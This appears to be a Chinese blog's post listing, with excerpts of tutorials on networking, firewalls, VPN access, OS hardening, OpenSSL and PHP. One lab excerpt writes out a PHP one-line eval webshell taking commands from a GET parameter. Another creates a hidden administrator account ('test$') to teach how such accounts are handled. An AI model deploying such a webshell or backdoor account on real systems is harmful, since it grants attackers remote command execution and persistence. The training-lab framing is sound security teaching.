- 博客(57)
- 收藏
- 关注
RSS订阅原创 移动接入资源发布技术
移动接入资源发布需求需求背景需求:出差或在家能接入企业/单位内网的应用系统 需要支持电脑接入访问B/S、C/S类所有应用解决方案:允许电脑接入后访问授权的业务系统(地址、协议、端口)移动接入资源发布技术资源分类资源是指远程接入SSL VPN后授权终端允许访问的网络服务根据实现机制和应用服务的不同将资源分为3类:WEB应用技术原理...
2022-01-04 20:42:27
1398
原创 移动接入身份认证技术
移动接入身份认证介绍什么是移动接入?现在的移动办公和远程办公已经成为了常态,扩展了组织网络的边界,让组织更加充分的利用互联网,让组织的信息化建设发挥更大的价值,然后就有了移动接入这个概念。需求背景用户远程接入企业内网,有哪些技术可以实现在复杂业务场景下,保障终端用户接入内网的身份安全性,同时尽可能保障用户使用体验?身份认证技术6种固定的认证方式(主认证)本地用户名/密码(微信扫码登录) LDAP服务器 Radius服务器 CA认证 AD域单点登...
2022-01-04 20:19:31
3496
原创 终端安全检测和防御技术
终端安全风险互联网出口实现了组织内部网络与互联网的逻辑隔离。对于内部网络接入用户来说,僵尸网络是最为严重的安全问题,黑客利用病毒木马蠕虫等等多种入侵手段控制终端,形成僵尸网络,进一步实现终端存储的信息被窃取、终端被引导访问钓鱼网站、终端被利用作为攻击跳板危害其他的各类资源等问题。黑客可以利用僵尸网络展开更多的危害行为,如APT攻击最常采用的跳板就是僵尸网络。黑客利用僵尸网络来实现渗透、监视、窃取敏感数据等目的,危害非常大。僵尸网络的主要危害有:终端上网安全可视可控技术...
2022-01-01 17:12:57
4306
原创 防火墙组网方案
防火墙组网简介部署模式简介AF基本应用场景下一代防火墙具备灵活的网络适应能力,支持:路由模式、透明模式、虚拟网线模式、混合模式、旁路模式。接口AF有哪些接口?根据接口属性分为:物理接口、子接口、VLAN接口、聚合接口。其中物理口可选择为:路由口、透明口、虚拟网线口、旁路镜像口。根据接口不同工作层面,可以划分为:二层区域、三层区域、虚拟网线区域。AF的部署模式是由各个接口的属性决定的。物理接口物理接口与AF设备面板上的接口一 一对应(eth0为manage.
2021-12-30 21:03:14
4154
原创 防火墙概述
防火墙的定义什么是防火墙?墙,始于防,忠于守。从古至今,墙予人以安全之意。防火墙分类防火墙分类 按物理特性划分 按性能划分 按防火墙结构划分 按防火墙技术划分 软件防火墙 百兆级防火墙 单一主机防火墙 包过滤防火墙 硬件防火墙 千兆级防火墙 路由集成防火墙 应用代理防火墙 ...... 分布式防火墙 状态监测防火墙 ...... ...... 防火墙的功能访问控制 地
2021-12-30 13:41:25
2988
1
原创 隧道技术GRE
隧道技术是VPN常用技术中的一种。GRE概述GRE:通用路由封装,全称 Generic Routing Encapsulation。它能快速、简单地跨越Internet(公网)实现私网之间连通,特别是在跨越公网组建大的网络。但GRE致命的缺点就是,他是明文传输数据。所以在部署GRE的时候,往往结合各种安全措施来保护数据,如利用Ipsec对其数加密。通用路由封装(GRE)是一种协议,用于将使用一个路由协议的数据包封装在另一协议的数据包中。“封装”是指将一个数据包...
2021-12-30 13:15:48
3519
原创 ACL访问控制列表
ACL可以通过对网络中报文流的精确识别,与其他技术结合,达到控制网络访问行为、防止网络攻击和提高网络带宽利用率的目的,从而切实保障网络环境的安全性和网络服务质量的可靠性。ACL概述ACL是由一系列permit或deny语句组成的、有序规则的列表。 ACL是一个匹配工具,能够对报文进行匹配和区分。ACL应用匹配IP流量 在Traffic-filter中被调用 在NAT(Network Address Translation)中被调用 在路由策略中被调用 在防火墙的策略部署中被调用 在
2021-12-28 14:15:52
1380
原创 单臂路由简单基础配置
PC1:IP地址:192.168.1.1子网掩码:255.255.255.0网关:192.168.1.254PC2:IP地址:192.168.1.2子网掩码:255.255.255.0网关:192.168.1.254PC3:IP地址:192.168.2.1子网掩码:255.255.255.0网关:192.168.2.254PC4:IP地址:192.168.2.2子网掩码:255.255.255.0网关:192.168.2.254SW1:<Huawei>...
2021-12-28 09:27:00
137
原创 Easy IP和NAT Server配置实例
Easy IP实现原理和NAPT相同,同时转换IP地址、传输层端口,区别在于Easy IP没有地址池的概念,使用接口地址作为NAT转换的公有地址。EasyIP适用于不具备固定公网IP地址的场景:如通过DHCP、PPPoE拨号获取地址的私有网络出口,可以直接使用获取到的动态地址进行转换。PC1:IP地址:192.168.1.1子网掩码:255.255.255.0网关:192.168.1.254PC2:IP地址:192.168.2.1子网掩...
2021-12-27 20:47:09
3695
1
原创 静态NAT和动态NAT
静态NATPC1:IP地址:192.168.1.1子网掩码:255.255.255.0网关:192.168.1.254PC2:IP地址:192.168.2.1子网掩码:255.255.255.0网关:192.168.2.254PC3:IP地址:192.168.3.1子网掩码:255.255.255.0网关:192.168.3.254Server1:IP地址:200.200.200.1子网掩码:255.255.255.252网关:200.200.
2021-12-23 20:27:47
9935
原创 不同VLAN间的通信
PC1:PC2:PC3:PC4:交换机SW1:<Huawei>system-view //进入系统试图[Huawei]undo info-center enable //关闭信息中心功能[Huawei]sysname SW1 //更改名字[SW1]vlan batch 10 20 //创建VLAN[SW1]int e0/0/1 //进入接口[SW1-Ethernet0/0/1]port link-type access //设置接口模式..
2021-12-22 20:55:59
827
原创 同VLAN间的通信
什么是VLAN?VLAN(Virtual LAN),翻译成中文是“虚拟局域网”。LAN可以是由少数几台家用计算机构成的网络,也可以是数以百计的计算机构成的企业网络。VLAN所指的LAN特指使用路由器分割的网络——也就是广播域。在此让我们先复习一下广播域的概念。广播域,指的是广播帧(目标MAC地址全部为1)所能传递到的范围,亦即能够直接通信的范围。严格地说,并不仅仅是广播帧,多播帧(Multicast Frame)和目标不明的单播帧(Unknown Unicast Fr...
2021-12-22 20:39:46
1061
原创 OSPF基础及简单的实验
定义: OSPF(Open Shortest Path First开放式最短路径优先)是一个内部网关协议(Interior Gateway Protocol,简称IGP),用于在单一自治系统(autonomous system,AS)内决策路由。是对链路状态路由协议的一种实现,隶属内部网关协议(IGP),故运作于自治系统内部。著名的迪克斯彻(Dijkstra)算法被用来计算最短路径树。OSPF支持负载均衡和基于服务类型的选路,也支持多种路由形式,如特定主机路由和子网路由等。工作原理:...
2021-12-22 19:55:46
269
原创 华为简单的直连、静态路由配置
实验PC1到PC2、PC3互通PC配置如下 :PC1 PC2 PC3:IP地址:192.168.1.1 IP地址:192.168.4.1 IP地址:192.168.6.1子网掩码:255.255.255.252 子网掩码:255.255...
2021-12-21 20:19:09
3107
原创 Windows隐藏账户处置
实验目的理解windows隐藏账户建立原理,掌握windows隐藏账户处置过程实验环境一台windows server 2012 r2实验原理通过注册表实现隐藏账户的建立,可以通过手工来建立隐藏账户实验步骤一、使用命令行创建用户1、打开命令行2、新建test$用户net user test$ sxf!7890 /addnet localgroup administrators test$ /add二、观察test$用户1、使用系统计算机管理工具.
2021-12-15 19:31:53
239
原创 基线管理之MariaDB安全配置
实验目的MariaDB的安全配置过程与配置方法,掌握数据库安全配置对安全运维至关重要。实验环境一台Centos7 已安装MariaDB数据库实验原理通过配置文件与数据库的配置,实现MariaDB安全配置实验步骤一、操作系统级权限检查1、检查数据库的运行权限,不建议以root运行数据库,防止越权攻击ps -ef | egrep "^mysql.*$"如图显示mysql的运行用户为mysql2、禁止mariadb的历史记录功能查找缓存文件find $H..
2021-12-13 21:04:40
2117
原创 基线管理之apache安全配置
实验目的理解apache安全配置项的作用,掌握安全配置项的配置方法实验环境一台Centos 7.2服务器,已安装apache httpd ,并开机自启动。实验原理通过编辑apache配置文件实现apache的安全配置,apache默认配置文件路径是/etc/httpd/conf/httpd.conf实验步骤一、确保apache无法访问根目录查看apache配置文件,确定里面对根目录是拒绝所有请求vim /etc/httpd/conf/httpd.conf按箭头,.
2021-12-13 20:17:11
113
原创 基线管理之Centos安全配置
实验目的通过配置Centos配置文件,加强Centos默认安全配置。同时也是理解linux一切皆文件的思想。尝试用shell脚本来处置Centos的安全配置。实验环境一台Centos 7.2 无需其他环境。实验原理Linux操作系统的配置基本上以配置文件展示,通过不同配置文件理解不同的配置。实验步骤一、网络配置1、检查不用的连接使用命令:ip link show up如下图,发现有两个连接一个为lo,一个为ens33,如果有需要关闭的接口,可以使用ip link se
2021-12-13 19:25:51
224
原创 基线管理之Windows安全配置
实验目的理解windows安全配置选项,掌握Windows组策略配置,理解Windows安全配置检查工具的应用。实验环境一台windows server 2012 R2实验原理windows通过组策略展示了详细的操作系统配置,通过配置组策略,将设置保存于windoows注册表,以便操作系统加载各项配置。实验步骤一、登陆服务器,打开组策略开始--运行(Win+R)输入gpedit.msc,点确定二、账户策略配置1、密码策略依次如图展开,如图进行配置..
2021-12-13 17:38:24
1558
原创 主机操作系统加固
账户管理和认证授权账户默认账户禁用Guest账户禁用或删除其他无用账户(建议先禁用账户三个月,带确认没有问题后删除。)思考:1、为什么要禁用Guest用户?Guest账户为临时账户,但是该账户允许用户登录到网络、浏览Internet以及关闭计算机。黑客可以通过Guest用户提权到administrator组得到管理员权限,进行后渗透。2、为什么禁用或禁用其他无用账户?防止提权。3、为什么建议先禁用账户三个月,待确认没有问题后删除?因为直接删除,有些正常用户就无法使
2021-12-09 21:00:40
336
原创 windows操作系统测评
远程管理,需要采用带加密管理的远程管理方式。本地策略编辑器(gpedit.msc)>本地计算机策略>计算机配置>管理模板>Windows组件>远程桌面服务>远程桌面会话主机>安全,该项中的相关项目进行配置。远程连接服务器,在自己电脑就行首先搜索远程桌面连接第一步:点连接第二步:如果连过直接输密码就行,如果连其他电脑,选择“使用其他账户”,然后输入账户名和密码就行,最后点确定。第三步:这里直接点是就行,我们就可以直接连接上,可能会稍微等会,
2021-12-09 19:07:05
1107
原创 windows基础、测评
win+r 输入cmd 跳出来dos系统界面dir 列出所有文件cd 进入某一个目录cd .. //返回上一个目录dir /a //显示出全部目录文件夹有空格,需要双引号没有空格,不需要引号切换到其他盘符C: 因为这里只有一个C盘或者C盘输入cmd,然后回车md 文件夹名 //创建文件夹dir //显示当前目录中的子文件夹与文件dir /a //显示隐藏文件例:dir /a //只显...
2021-12-08 20:26:56
177
原创 Linux主机系统加固
账号和口令禁用或删除无用账号减少系统无用账号,降低安全风险操作步骤cat /etc/shadow 查看有多少账户 使用命令 userdel <用户名> 删除不必要的账号。使用命令 passwd -l <用户名> 锁定不必要的账号。使用命令 passwd -u <用户名> 解锁必要的账号。检查特殊账号检查是否存在空口令和root权限的账号AWK解释awk [options] 'pattern + action...
2021-12-07 20:20:08
116
原创 密码学之使用密钥登录SSH服务器
实验目的掌握SSH密钥登录的配置与应用实验环境两台centos服务器一台作为SSH服务器一台作为SSH客户端,使用密钥连接SSH服务器实验原理SSH登录除了传统的密码登录,可以使用密钥文件登录,结合PAM模块,也可以实现双因子登录等。实验步骤一、配置服务器SSH密钥登录以下操作使用服务器进行1、编辑SSH配置文件vim /etc/ssh/sshd_config2、删除#号删除PubkeyAuthentication yes此行前面的#号保.
2021-12-06 20:11:31
116
原创 密码学之apache部署https
实验目的掌握apache部署自定义证书的https服务器方法实验拓扑实验环境一台Centos 7.2 已经安装openssl组件,已安装apache httpd,用于搭建https服务器一台windows 10客户端,已安装chrome浏览器实验原理openssl是Linux内置的一款开源工具,实现了常见的密码算法与应用。通过openssl操作,完成各种密码算法的应用。实验步骤一、生成独立的CA1、生成ca的keyopenssl genrsa -des3 -o
2021-12-06 19:33:57
426
原创 OPENSSL基础使用
实验目的掌握常见的密码学算法应用,包含des aes md5 rsa等实验环境一台Centos 7.2,已经安装openssl组件实验原理openssl是Linux内置的一款开源工具,实现了常见的密码算法与应用。通过openssl操作,完成各种密码算法的应用。实验步骤创建一个文件,用于被加密,文件内容为12345,文件名为test.txt一、对称加密1、使用rc4加解密加密解密二、非对称加密 1、RSA加解密码生成RSA密钥对opens
2021-12-06 17:59:11
918
原创 一句话木马
过程中出现乱码可以用这条命令来解决:header('Content-Type: text/html;charset=gbk');1.GET第一步:在www目录下新建一个get.php文件第二步:进行编辑<?php @eval($_GET['cmd']);?>第三步:在网页中打开,里面的 "ipconfig" 也可以换成 "whoami"(%27就是单引号[ ' ])http://127.0.0.1/get.php?cmd=system(%27ipconfig.
2021-12-03 19:02:18
287
原创 PHP 多维数组和PHP Error(PHP 错误处理)
PHP 多维数组一个数组中的值可以是另一个数组,另一个数组的值也可以是一个数组。依照这种方式,我们可以创建二维或者三维数组:<pre><?php//二维数组:$cars=array(array("Volvo",100,96),array("BMW",60,59),array("Toyota",110,100));print_r($cars);?></pre>PHP多维数组多维数组是包含一个或多个数组的...
2021-12-02 20:07:49
123
原创 PHP 表单和用户输入
PHP 中的 $_GET 和 $_POST 变量用于检索表单中的信息,比如用户输入。PHP 表单处理有一点很重要的事情值得注意,当处理 HTML 表单时,PHP 能把来自 HTML 页面中的表单元素自动变成可供 PHP 脚本使用。实例下面的实例包含了一个 HTML 表单,带有两个输入框和一个提交按钮。form.html 文件代码:<html><head><meta charset="utf-8"><title>index</
2021-12-02 19:31:51
348
原创 PHP 函数和PHP 魔术常量
PHP 函数PHP 的真正威力源自于它的函数。在 PHP 中,提供了超过 1000 个内建的函数。PHP 函数在本章中,我们将为您讲解如何创建自己的函数。如要在页面加载时执行脚本,您可以把它放到函数里。函数是通过调用函数来执行的。你可以在页面的任何位置调用函数。创建 PHP 函数函数是通过调用函数来执行的。语法<?phpfunction functionName(){ // 要执行的代码}?>PHP 函数准则:函数的名称应该提示...
2021-12-02 17:46:06
67
原创 PHP循环While和For
PHP循环——While循环循环执行代码块指定的次数,或者当指定的条件为真时循环执行代码块。PHP 循环在您编写代码时,您经常需要让相同的代码块一次又一次地重复运行。我们可以在代码中使用循环语句来完成这个任务。在 PHP 中,提供了下列循环语句:while - 只要指定的条件成立,则循环执行代码块 do...while - 首先执行一次代码块,然后在指定的条件成立时重复这个循环 for - 循环执行代码块指定的次数 foreach - 根据数组中每个元素来循环代码块while 循
2021-12-02 10:16:26
254
2
原创 PHP数组和数组排序
PHP数组数组能够在单个变量中存储多个值:<?php$cars=array("Volvo","BMW","Toyota","红旗");echo "I like", $cars[0] . "," . $cars[1] . " and " . $cars[2] . "." . " and" . $cars[3] . ".";?>数组是什么?数组是一个能在单个变量中存储多个值的特殊变量。如果您有一个项目清单(例如:车名字的清单),将其存储到单个变量中,如下所示:$c.
2021-12-01 21:01:49
101
原创 PHP - if...elseif....else和Switch语句
PHP If...Else 语句条件语句用于根据不同条件执行不同动作。PHP 条件语句当您编写代码时,您常常需要为不同的判断执行不同的动作。您可以在代码中使用条件语句来完成此任务。在 PHP 中,提供了下列条件语句:if 语句 - 在条件成立时执行代码 if...else 语句 - 在条件成立时执行一块代码,条件不成立时执行另一块代码 if...elseif....else 语句 - 在若干条件之一成立时执行一个代码块 switch 语句 - 在若干条件之一成立时执行一个代码块P
2021-12-01 20:43:32
272
原创 PHP 运算符
在 PHP 中,赋值运算符 = 用于给变量赋值。在 PHP 中,算术运算符 + 用于把值加在一起。PHP算术运算符运算符 名称 描述 实例 结果 x + y 加 x 和 y 的和 2 + 2 4 x - y 减 x 和 y 的差 5 - 2 3 x * y 乘 x 和 y 的积 5 * 2 10 x / y 除 x 和 y 的商 15 / 5 3 x % y
2021-12-01 18:48:41
348
1
原创 PHP数据类型和类型比较
PHP数据类型PHP数据类型:String(字符串), Integer(整型), Float(浮点型), Boolean(布尔型), Array(数组), Object(对象), NULL(空值)。PHP字符串一个字符串是一串字符的序列,就像 "Hello world!"。可以将任何文本放在单引号和双引号中:上方显示数据类型和字符长度,下方显示"Hello world!"<?php$x = "Hello world!";var_dump($x);echo "<br>"
2021-12-01 16:45:14
273
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人